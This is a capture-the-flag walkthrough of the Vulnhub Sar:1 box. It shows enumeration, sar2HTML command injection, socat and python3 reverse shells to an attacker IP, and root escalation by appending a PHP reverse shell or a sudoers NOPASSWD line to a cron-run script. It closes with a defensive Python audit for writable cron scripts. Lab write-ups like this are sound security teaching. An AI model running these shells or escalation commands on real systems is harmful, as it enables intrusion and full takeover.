Sar:1 Vulnhub Walkthrough
Enumeration
Nmap
```bash
nmap -sC -sV -oA nmap/sar1 192.168.43.166
```
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 22:37 EDT
Nmap scan report for 192.168.1.112
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:46:0D:BC (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds
```
Only one port open. Great!
Dirb
```bash
dirb http://192.168.43.166
```
```
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed May 13 22:38:52 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.112/ ----
+ http://192.168.1.112/index.html (CODE:200|SIZE:10918)
+ http://192.168.1.112/phpinfo.php (CODE:200|SIZE:95475)
+ http://192.168.1.112/robots.txt (CODE:200|SIZE:9)
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Wed May 13 22:38:57 2020
DOWNLOADED: 4612 - FOUND: 4
```
Reverse Shell
Let's navigate to robots.txt. It points at sar2HTML, so replace robots.txt with sar2HTML in the URL.

After Googling for a while, I found a sar2HTML exploit on Exploit-DB.

The application does not sanitize the plot parameter: a semicolon placed after the plot value lets us append a command that the server executes. This is where we can supply a reverse shell payload and get access to the machine.
A plain `nc -nv <IP> <Port>` reverse shell doesn't work here, so I use socat to get a shell. A python3 one-liner also works.

Socat

Victim's machine:
```bash
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
Attacking machine:
```bash
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

Python3

Victim's machine:
```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
Attacking machine:
```bash
nc -nlvp <port>
```

We got a shell!

Navigate to the home directory of the user love to get the user flag.
Privilege Escalation
After trying a few methods, I found something in the crontab.

It seems there is a file called finally.sh that runs as root every 5 minutes. Let's locate the file.

After that we cat finally.sh.

Inside finally.sh we can see that it runs another file called write.sh, which sits in the same folder.

finally.sh is not writable by a normal user, but write.sh is.

Because the cron job runs as root and executes write.sh through finally.sh, anything we append to write.sh will also run as root. We can add some code inside.
Method 1
```bash
echo "php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh
```
Then go to the attacking machine and set up a listener by typing
```bash
nc -lvp 4444
```
Wait 5 minutes and you will get a shell, and it is root!

Method 2
```bash
echo "www-data NOPASSWD: /bin/bash" >> /etc/sudoers
```
Wait 5 minutes, then type
```bash
sudo -l
```
and you will see that the /bin/bash entry we created earlier can be executed without a password. Then
```bash
sudo /bin/bash
```
to get root!
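The root cause of both methods is the same: a root cron job runs a script that in turn runs a file a low-privileged user can modify. The audit below, an added example that is not part of this walkthrough or the box itself, parses system-crontab lines (the `*/5 * * * * root /path/finally.sh` format is an assumption about how the job was defined), follows absolute paths referenced inside each script, and reports any file in that chain that is group- or world-writable. `demo()` builds a constructed fixture in a temp directory that mirrors the finally.sh / write.sh setup.

```python
import os
import re
import stat
import tempfile

# System-crontab format (/etc/crontab, /etc/cron.d): five time fields, a user, then the command.
CRON_LINE = re.compile(r"^\s*(?:\S+\s+){5}(\S+)\s+(.+)$")
ABS_PATH = re.compile(r"(?<!\w)(/[\w./-]+)")

def loosely_writable(path):
    """Group- or world-writable: a low-privileged local user can change what root will run."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def scripts_reached(path, seen=None):
    """path plus every existing file it references by absolute path (finally.sh -> write.sh)."""
    seen = [] if seen is None else seen
    if path in seen or not os.path.isfile(path):
        return seen
    seen.append(path)
    data = open(path, "rb").read()
    if b"\0" not in data[:512]:  # only descend into text files, not ELF binaries like /bin/bash
        for child in ABS_PATH.findall(data.decode(errors="replace")):
            scripts_reached(child, seen)
    return seen

def audit_crontab(text):
    """(cron line, script) pairs where a root job ends up running a file non-root users can edit."""
    findings = []
    for line in text.splitlines():
        m = CRON_LINE.match(line)
        if not m or line.lstrip().startswith("#") or m.group(1) != "root":
            continue
        for entry in ABS_PATH.findall(m.group(2)):
            for script in scripts_reached(entry):
                if loosely_writable(script):
                    findings.append((line.strip(), script))
    return findings

def demo():
    """Constructed fixture mirroring the box: root cron -> finally.sh (0755) -> write.sh (0777)."""
    d = tempfile.mkdtemp()
    finally_sh, write_sh = os.path.join(d, "finally.sh"), os.path.join(d, "write.sh")
    with open(write_sh, "w") as fh:
        fh.write("#!/bin/bash\necho 'doing some work'\n")
    with open(finally_sh, "w") as fh:
        fh.write(f"#!/bin/bash\n{write_sh}\n")
    os.chmod(finally_sh, 0o755)
    os.chmod(write_sh, 0o777)
    return audit_crontab(f"*/5 * * * * root {finally_sh}\n")
```

Running `demo()` flags only write.sh: finally.sh itself is 0755 and passes, which is exactly the gap the walkthrough exploits. The fix on a real host is `chmod 755` (and root ownership) on every script in the chain.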

Navigate to /root
to get the flag!

Congratulations!